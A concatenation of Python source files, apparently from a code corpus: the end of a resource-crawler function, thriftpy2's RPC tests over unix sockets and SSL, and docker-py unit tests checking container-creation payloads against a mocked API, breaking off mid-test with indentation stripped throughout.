return resources.from_root_id(client, config.get_root_resource_id())
def run_crawler(storage,
progresser,
config,
parallel=True):
"""Run the crawler with a determined configuration.
Args:
storage (object): Storage implementation to use.
progresser (object): Progresser to notify status updates.
config (object): Inventory configuration on server.
parallel (bool): If true, use the parallel crawler implementation.
Returns:
QueueProgresser: The progresser implemented in inventory
"""
if parallel and 'sqlite' in str(config.get_service_config().get_engine()):
LOGGER.info('SQLite used, disabling parallel threads.')
parallel = False
client = _api_client_factory(storage, config, parallel)
crawler_impl = _crawler_factory(storage, progresser, client, parallel)
resource = _root_resource_factory(config, client)
progresser = crawler_impl.run(resource)
# flush the buffer at the end to make sure nothing is cached.
storage.commit()
return progresser
|
test_rpc.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import os
import multiprocessing
import socket
import time
import ssl
import pytest
import thriftpy2
thriftpy2.install_import_hook()
from thriftpy2._compat import PY3 # noqa
from thriftpy2.rpc import make_server, client_context # noqa
from thriftpy2.transport import TTransportException # noqa
addressbook = thriftpy2.load(os.path.join(os.path.dirname(__file__),
"addressbook.thrift"))
unix_sock = "/tmp/thriftpy_test.sock"
SSL_PORT = 50441
class Dispatcher(object):
def __init__(self):
self.ab = addressbook.AddressBook()
self.ab.people = {}
def ping(self):
return True
def hello(self, name):
return "hello " + name
def add(self, person):
self.ab.people[person.name] = person
return True
def remove(self, name):
try:
self.ab.people.pop(name)
return True
except KeyError:
raise addressbook.PersonNotExistsError(
"{} not exists".format(name))
def get(self, name):
try:
return self.ab.people[name]
except KeyError:
raise addressbook.PersonNotExistsError(
"{} not exists".format(name))
def book(self):
return self.ab
def get_phonenumbers(self, name, count):
p = [self.ab.people[name].phones[0]] if name in self.ab.people else []
return p * count
def get_phones(self, name):
phone_numbers = self.ab.people[name].phones
return dict((p.type, p.number) for p in phone_numbers)
def sleep(self, ms):
time.sleep(ms / 1000.0)
return True
def close(self, ms):
return
@pytest.fixture(scope="module")
def server(request):
server = make_server(addressbook.AddressBookService, Dispatcher(),
unix_socket=unix_sock)
ps = multiprocessing.Process(target=server.serve)
ps.start()
time.sleep(0.1)
def fin():
if ps.is_alive():
ps.terminate()
try:
os.remove(unix_sock)
except IOError:
pass
request.addfinalizer(fin)
@pytest.fixture(scope="module")
def ssl_server(request):
ssl_server = make_server(addressbook.AddressBookService, Dispatcher(),
host='localhost', port=SSL_PORT,
certfile="ssl/server.pem")
ps = multiprocessing.Process(target=ssl_server.serve)
ps.start()
time.sleep(0.1)
def fin():
if ps.is_alive():
ps.terminate()
request.addfinalizer(fin)
@pytest.fixture(scope="module")
def person():
phone1 = addressbook.PhoneNumber()
phone1.type = addressbook.PhoneType.MOBILE
phone1.number = '555-1212'
phone2 = addressbook.PhoneNumber()
phone2.type = addressbook.PhoneType.HOME
phone2.number = '555-1234'
# empty struct
phone3 = addressbook.PhoneNumber()
alice = addressbook.Person()
alice.name = "Alice"
alice.phones = [phone1, phone2, phone3]
alice.created_at = int(time.time())
return alice
def client(timeout=3000):
return client_context(addressbook.AddressBookService,
unix_socket=unix_sock, timeout=timeout)
def ssl_client(timeout=3000):
return client_context(addressbook.AddressBookService,
host='localhost', port=SSL_PORT,
timeout=timeout,
cafile="ssl/CA.pem", certfile="ssl/client.crt",
keyfile="ssl/client.key")
def test_void_api(server):
with client() as c:
assert c.ping() is None
def test_void_api_with_ssl(ssl_server):
with ssl_client() as c:
assert c.ping() is None
def test_string_api(server):
with client() as c:
assert c.hello("world") == "hello world"
def test_string_api_with_ssl(ssl_server):
with ssl_client() as c:
assert c.hello("world") == "hello world"
def test_huge_res(server):
with client() as c:
big_str = "world" * 100000
assert c.hello(big_str) == "hello " + big_str
def test_huge_res_with_ssl(ssl_server):
with ssl_client() as c:
big_str = "world" * 100000
assert c.hello(big_str) == "hello " + big_str
def test_tstruct_req(person):
with client() as c:
assert c.add(person) is True
def test_tstruct_req_with_ssl(person):
with ssl_client() as c:
assert c.add(person) is True
def test_tstruct_res(person):
with client() as c:
assert person == c.get("Alice")
def test_tstruct_res_with_ssl(person):
with ssl_client() as c:
assert person == c.get("Alice")
def test_complex_tstruct():
with client() as c:
assert len(c.get_phonenumbers("Alice", 0)) == 0
assert len(c.get_phonenumbers("Alice", 1000)) == 1000
def test_complex_tstruct_with_ssl():
with ssl_client() as c:
assert len(c.get_phonenumbers("Alice", 0)) == 0
assert len(c.get_phonenumbers("Alice", 1000)) == 1000
def test_exception():
with pytest.raises(addressbook.PersonNotExistsError):
with client() as c:
c.remove("Bob")
def test_exception_iwth_ssl():
with pytest.raises(addressbook.PersonNotExistsError):
with ssl_client() as c:
c.remove("Bob")
def test_client_timeout():
with pytest.raises(socket.timeout):
with client(timeout=500) as c:
c.sleep(1000)
def test_client_socket_timeout():
with pytest.raises(socket.timeout):
with client_context(addressbook.AddressBookService,
unix_socket=unix_sock,
socket_timeout=500) as c:
c.sleep(1000)
def test_client_connect_timeout():
with pytest.raises(TTransportException):
with client_context(addressbook.AddressBookService,
unix_socket='/tmp/test.sock',
connect_timeout=1000) as c:
c.hello('test')
def test_ssl_client_timeout():
# SSL socket timeout raises socket.timeout since Python 3.2.
# http://bugs.python.org/issue10272
with pytest.raises(socket.timeout if PY3 else ssl.SSLError):
with ssl_client(timeout=500) as c:
c.sleep(1000)
def test_close_method():
with client() as c:
c.tclose(1)
|
test.py
|
# Copyright 2013 dotCloud inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import datetime
import gzip
import io
import json
import os
import re
import shutil
import signal
import socket
import sys
import tarfile
import tempfile
import threading
import time
import unittest
import warnings
import random
import docker
import requests
import six
import base
import fake_api
try:
from unittest import mock
except ImportError:
import mock
DEFAULT_TIMEOUT_SECONDS = docker.client.constants.DEFAULT_TIMEOUT_SECONDS
warnings.simplefilter('error')
warnings.filterwarnings('error')
create_host_config = docker.utils.create_host_config
def response(status_code=200, content='', headers=None, reason=None, elapsed=0,
request=None):
res = requests.Response()
res.status_code = status_code
if not isinstance(content, six.binary_type):
content = json.dumps(content).encode('ascii')
res._content = content
res.headers = requests.structures.CaseInsensitiveDict(headers or {})
res.reason = reason
res.elapsed = datetime.timedelta(elapsed)
res.request = request
return res
def fake_resolve_authconfig(authconfig, registry=None):
return None
def fake_resp(url, data=None, **kwargs):
status_code, content = fake_api.fake_responses[url]()
return response(status_code=status_code, content=content)
fake_request = mock.Mock(side_effect=fake_resp)
url_prefix = 'http+docker://localunixsocket/v{0}/'.format(
docker.client.constants.DEFAULT_DOCKER_API_VERSION)
class Cleanup(object):
if sys.version_info < (2, 7):
# Provide a basic implementation of addCleanup for Python < 2.7
def __init__(self, *args, **kwargs):
super(Cleanup, self).__init__(*args, **kwargs)
self._cleanups = []
def tearDown(self):
super(Cleanup, self).tearDown()
ok = True
while self._cleanups:
fn, args, kwargs = self._cleanups.pop(-1)
try:
fn(*args, **kwargs)
except KeyboardInterrupt:
raise
except:
ok = False
if not ok:
raise
def addCleanup(self, function, *args, **kwargs):
self._cleanups.append((function, args, kwargs))
@mock.patch.multiple('docker.Client', get=fake_request, post=fake_request,
put=fake_request, delete=fake_request)
class DockerClientTest(Cleanup, base.BaseTestCase):
def setUp(self):
self.client = docker.Client()
# Force-clear authconfig to avoid tampering with the tests
self.client._cfg = {'Configs': {}}
def tearDown(self):
self.client.close()
def assertIn(self, object, collection):
if six.PY2 and sys.version_info[1] <= 6:
return self.assertTrue(object in collection)
return super(DockerClientTest, self).assertIn(object, collection)
def base_create_payload(self, img='busybox', cmd=None):
if not cmd:
cmd = ['true']
return {"Tty": False, "Image": img, "Cmd": cmd,
"AttachStdin": False, "Memory": 0,
"AttachStderr": True, "AttachStdout": True,
"StdinOnce": False,
"OpenStdin": False, "NetworkDisabled": False,
"MemorySwap": 0
}
def test_ctor(self):
try:
docker.Client(version=1.12)
except Exception as e:
self.assertTrue(isinstance(e, docker.errors.DockerException))
if not six.PY3:
self.assertEqual(
str(e),
'Version parameter must be a string or None. Found float'
)
#########################
# INFORMATION TESTS #
#########################
def test_version(self):
try:
self.client.version()
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_retrieve_server_version(self):
client = docker.Client(version="auto")
self.assertTrue(isinstance(client._version, six.string_types))
self.assertFalse(client._version == "auto")
client.close()
def test_auto_retrieve_server_version(self):
try:
version = self.client._retrieve_server_version()
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
else:
self.assertTrue(isinstance(version, six.string_types))
def test_info(self):
try:
self.client.info()
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'info',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_search(self):
try:
self.client.search('busybox')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/search',
params={'term': 'busybox'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_image_viz(self):
try:
self.client.images('busybox', viz=True)
self.fail('Viz output should not be supported!')
except Exception:
pass
def test_events(self):
try:
self.client.events()
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'events',
params={'since': None, 'until': None, 'filters': None},
stream=True
)
def test_events_with_since_until(self):
ts = 1356048000
now = datetime.datetime.fromtimestamp(ts)
since = now - datetime.timedelta(seconds=10)
until = now + datetime.timedelta(seconds=10)
try:
self.client.events(since=since, until=until)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'events',
params={
'since': ts - 10,
'until': ts + 10,
'filters': None
},
stream=True
)
def test_events_with_filters(self):
filters = {'event': ['die', 'stop'],
'container': fake_api.FAKE_CONTAINER_ID}
try:
self.client.events(filters=filters)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
expected_filters = docker.utils.convert_filters(filters)
fake_request.assert_called_with(
url_prefix + 'events',
params={
'since': None,
'until': None,
'filters': expected_filters
},
stream=True
)
###################
# LISTING TESTS #
###################
def test_images(self):
try:
self.client.images(all=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 0, 'all': 1},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_images_quiet(self):
try:
self.client.images(all=True, quiet=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 1, 'all': 1},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_image_ids(self):
try:
self.client.images(quiet=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 1, 'all': 0},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_images_filters(self):
try:
self.client.images(filters={'dangling': True})
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'images/json',
params={'filter': None, 'only_ids': 0, 'all': 0,
'filters': '{"dangling": ["true"]}'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_list_containers(self):
try:
self.client.containers(all=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
fake_request.assert_called_with(
url_prefix + 'containers/json',
params={
'all': 1,
'since': None,
'size': 0,
'limit': -1,
'trunc_cmd': 0,
'before': None
},
timeout=DEFAULT_TIMEOUT_SECONDS
)
#####################
# CONTAINER TESTS #
#####################
def test_create_container(self):
try:
self.client.create_container('busybox', 'true')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox", "Cmd": ["true"],
"AttachStdin": false, "Memory": 0,
"AttachStderr": true, "AttachStdout": true,
"StdinOnce": false,
"OpenStdin": false, "NetworkDisabled": false,
"MemorySwap": 0}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_binds(self):
mount_dest = '/mnt'
try:
self.client.create_container('busybox', ['ls', mount_dest],
volumes=[mount_dest])
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls", "/mnt"], "AttachStdin": false,
"Volumes": {"/mnt": {}}, "Memory": 0,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"MemorySwap": 0}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_volume_string(self):
mount_dest = '/mnt'
try:
self.client.create_container('busybox', ['ls', mount_dest],
volumes=mount_dest)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls", "/mnt"], "AttachStdin": false,
"Volumes": {"/mnt": {}}, "Memory": 0,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"MemorySwap": 0}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_ports(self):
try:
self.client.create_container('busybox', 'ls',
ports=[1111, (2222, 'udp'), (3333,)])
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"Memory": 0, "ExposedPorts": {
"1111/tcp": {},
"2222/udp": {},
"3333/tcp": {}
},
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"MemorySwap": 0}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_entrypoint(self):
try:
self.client.create_container('busybox', 'hello',
entrypoint='cowsay')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["hello"], "AttachStdin": false,
"Memory": 0,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"Entrypoint": "cowsay",
"MemorySwap": 0}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_cpu_shares(self):
try:
self.client.create_container('busybox', 'ls',
cpu_shares=5)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"Memory": 0,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"CpuShares": 5,
"MemorySwap": 0}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_cpuset(self):
try:
self.client.create_container('busybox', 'ls',
cpuset='0,1')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"Memory": 0,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"Cpuset": "0,1",
"CpusetCpus": "0,1",
"MemorySwap": 0}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_working_dir(self):
try:
self.client.create_container('busybox', 'ls',
working_dir='/root')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox",
"Cmd": ["ls"], "AttachStdin": false,
"Memory": 0,
"AttachStderr": true,
"AttachStdout": true, "OpenStdin": false,
"StdinOnce": false,
"NetworkDisabled": false,
"WorkingDir": "/root",
"MemorySwap": 0}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_stdin_open(self):
try:
self.client.create_container('busybox', 'true', stdin_open=True)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox", "Cmd": ["true"],
"AttachStdin": true, "Memory": 0,
"AttachStderr": true, "AttachStdout": true,
"StdinOnce": true,
"OpenStdin": true, "NetworkDisabled": false,
"MemorySwap": 0}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_with_volumes_from(self):
vol_names = ['foo', 'bar']
try:
self.client.create_container('busybox', 'true',
volumes_from=vol_names)
except docker.errors.DockerException as e:
self.assertTrue(
docker.utils.compare_version('1.10', self.client._version) >= 0
)
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data'])['VolumesFrom'],
','.join(vol_names))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
def test_create_container_empty_volumes_from(self):
try:
self.client.create_container('busybox', 'true', volumes_from=[])
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertTrue('VolumesFrom' not in data)
def test_create_named_container(self):
try:
self.client.create_container('busybox', 'true',
name='marisa-kirisame')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0],
url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']),
json.loads('''
{"Tty": false, "Image": "busybox", "Cmd": ["true"],
"AttachStdin": false, "Memory": 0,
"AttachStderr": true, "AttachStdout": true,
"StdinOnce": false,
"OpenStdin": false, "NetworkDisabled": false,
"MemorySwap": 0}'''))
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(args[1]['params'], {'name': 'marisa-kirisame'})
def test_create_container_with_mem_limit_as_int(self):
try:
self.client.create_container('busybox', 'true',
mem_limit=128.0)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['Memory'], 128.0)
def test_create_container_with_mem_limit_as_string(self):
try:
self.client.create_container('busybox', 'true',
mem_limit='128')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['Memory'], 128.0)
def test_create_container_with_mem_limit_as_string_with_k_unit(self):
try:
self.client.create_container('busybox', 'true',
mem_limit='128k')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['Memory'], 128.0 * 1024)
def test_create_container_with_mem_limit_as_string_with_m_unit(self):
try:
self.client.create_container('busybox', 'true',
mem_limit='128m')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['Memory'], 128.0 * 1024 * 1024)
def test_create_container_with_mem_limit_as_string_with_g_unit(self):
try:
self.client.create_container('busybox', 'true',
mem_limit='128g')
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
data = json.loads(args[1]['data'])
self.assertEqual(data['Memory'], 128.0 * 1024 * 1024 * 1024)
def test_create_container_with_mem_limit_as_string_with_wrong_value(self):
self.assertRaises(docker.errors.DockerException,
self.client.create_container,
'busybox', 'true', mem_limit='128p')
self.assertRaises(docker.errors.DockerException,
self.client.create_container,
'busybox', 'true', mem_limit='1f28')
def test_start_container(self):
try:
self.client.start(fake_api.FAKE_CONTAINER_ID)
except Exception as e:
raise e
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(
args[0][0],
url_prefix + 'containers/3cc2351ab11b/start'
)
self.assertEqual(json.loads(args[1]['data']), {})
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'], DEFAULT_TIMEOUT_SECONDS
)
def test_start_container_none(self):
try:
self.client.start(container=None)
except ValueError as e:
self.assertEqual(str(e), 'image or container param is undefined')
else:
self.fail('Command should raise ValueError')
try:
self.client.start(None)
except ValueError as e:
self.assertEqual(str(e), 'image or container param is undefined')
else:
self.fail('Command should raise ValueError')
def test_start_container_regression_573(self):
try:
self.client.start(**{'container': fake_api.FAKE_CONTAINER_ID})
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
def test_create_container_with_lxc_conf(self):
try:
self.client.create_container(
'busybox', 'true', host_config=create_host_config(
lxc_conf={'lxc.conf.k': 'lxc.conf.value'}
)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(
args[0][0],
url_prefix + 'containers/create'
)
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['LxcConf'] = [
{"Value": "lxc.conf.value", "Key": "lxc.conf.k"}
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'],
{'Content-Type': 'application/json'}
)
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_lxc_conf_compat(self):
try:
self.client.create_container(
'busybox', 'true', host_config=create_host_config(
lxc_conf=[{'Key': 'lxc.conf.k', 'Value': 'lxc.conf.value'}]
)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['LxcConf'] = [
{"Value": "lxc.conf.value", "Key": "lxc.conf.k"}
]
self.assertEqual(
json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_binds_ro(self):
try:
mount_dest = '/mnt'
mount_origin = '/tmp'
self.client.create_container(
'busybox', 'true', host_config=create_host_config(
binds={mount_origin: {
"bind": mount_dest,
"ro": True
}}
)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix +
'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['Binds'] = ["/tmp:/mnt:ro"]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_binds_rw(self):
try:
mount_dest = '/mnt'
mount_origin = '/tmp'
self.client.create_container(
'busybox', 'true', host_config=create_host_config(
binds={mount_origin: {
"bind": mount_dest,
"ro": False
}}
)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix +
'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['Binds'] = ["/tmp:/mnt:rw"]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_port_binds(self):
self.maxDiff = None
try:
self.client.create_container(
'busybox', 'true', host_config=create_host_config(
port_bindings={
1111: None,
2222: 2222,
'3333/udp': (3333,),
4444: ('127.0.0.1',),
5555: ('127.0.0.1', 5555),
6666: [('127.0.0.1',), ('192.168.0.1',)]
}
)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
data = json.loads(args[1]['data'])
port_bindings = data['HostConfig']['PortBindings']
self.assertTrue('1111/tcp' in port_bindings)
self.assertTrue('2222/tcp' in port_bindings)
self.assertTrue('3333/udp' in port_bindings)
self.assertTrue('4444/tcp' in port_bindings)
self.assertTrue('5555/tcp' in port_bindings)
self.assertTrue('6666/tcp' in port_bindings)
self.assertEqual(
[{"HostPort": "", "HostIp": ""}],
port_bindings['1111/tcp']
)
self.assertEqual(
[{"HostPort": "2222", "HostIp": ""}],
port_bindings['2222/tcp']
)
self.assertEqual(
[{"HostPort": "3333", "HostIp": ""}],
port_bindings['3333/udp']
)
self.assertEqual(
[{"HostPort": "", "HostIp": "127.0.0.1"}],
port_bindings['4444/tcp']
)
self.assertEqual(
[{"HostPort": "5555", "HostIp": "127.0.0.1"}],
port_bindings['5555/tcp']
)
self.assertEqual(len(port_bindings['6666/tcp']), 2)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_create_container_with_mac_address(self):
try:
mac_address_expected = "02:42:ac:11:00:0a"
container = self.client.create_container(
'busybox', ['sleep', '60'], mac_address=mac_address_expected)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
res = self.client.inspect_container(container['Id'])
self.assertEqual(mac_address_expected,
res['NetworkSettings']['MacAddress'])
def test_create_container_with_links(self):
try:
link_path = 'path'
alias = 'alias'
self.client.create_container(
'busybox', 'true', host_config=create_host_config(
links={link_path: alias}
)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(
args[0][0], url_prefix + 'containers/create'
)
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['Links'] = ['path:alias']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
def test_create_container_with_multiple_links(self):
try:
link_path = 'path'
alias = 'alias'
self.client.create_container(
'busybox', 'true', host_config=create_host_config(
links={
link_path + '1': alias + '1',
link_path + '2': alias + '2'
}
)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['Links'] = [
'path1:alias1', 'path2:alias2'
]
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
def test_create_container_with_links_as_list_of_tuples(self):
try:
link_path = 'path'
alias = 'alias'
self.client.create_container(
'busybox', 'true', host_config=create_host_config(
links=[(link_path, alias)]
)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['Links'] = ['path:alias']
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(
args[1]['headers'], {'Content-Type': 'application/json'}
)
def test_create_container_privileged(self):
try:
self.client.create_container(
'busybox', 'true',
host_config=create_host_config(privileged=True)
)
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
expected_payload = self.base_create_payload()
expected_payload['HostConfig'] = create_host_config()
expected_payload['HostConfig']['Privileged'] = True
args = fake_request.call_args
self.assertEqual(args[0][0], url_prefix + 'containers/create')
self.assertEqual(json.loads(args[1]['data']), expected_payload)
self.assertEqual(args[1]['headers'],
{'Content-Type': 'application/json'})
self.assertEqual(
args[1]['timeout'],
DEFAULT_TIMEOUT_SECONDS
)
def test_start_container_with_lxc_conf(self):
if six.PY2:
try:
self.client.start(
fake_api.FAKE_CONTAINER_ID,
lxc_conf={'lxc.conf.k': 'lxc.conf.value'}
)
except DeprecationWarning as e:
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
else:
self.fail('Expected a DeprecationWarning')
else:
with self.assertWarns(DeprecationWarning):
self.client.start(
fake_api.FAKE_CONTAINER_ID,
lxc_conf={'lxc.conf.k': 'lxc.conf.value'}
)
def test_start_container_with_lxc_conf_compat(self):
if six.PY2:
try:
self.client.start(
fake_api.FAKE_CONTAINER_ID,
lxc_conf=[{'Key': 'lxc.conf.k', 'Value': 'lxc.conf.value'}]
)
except DeprecationWarning as e:
return
except Exception as e:
self.fail('Command should not raise exception: {0}'.format(e))
else:
self.fail('Expected a DeprecationWarning')
else:
with self.assertWarns(DeprecationWarning):
self.client.start(
fake_api.FAKE_CONTAINER_ID,
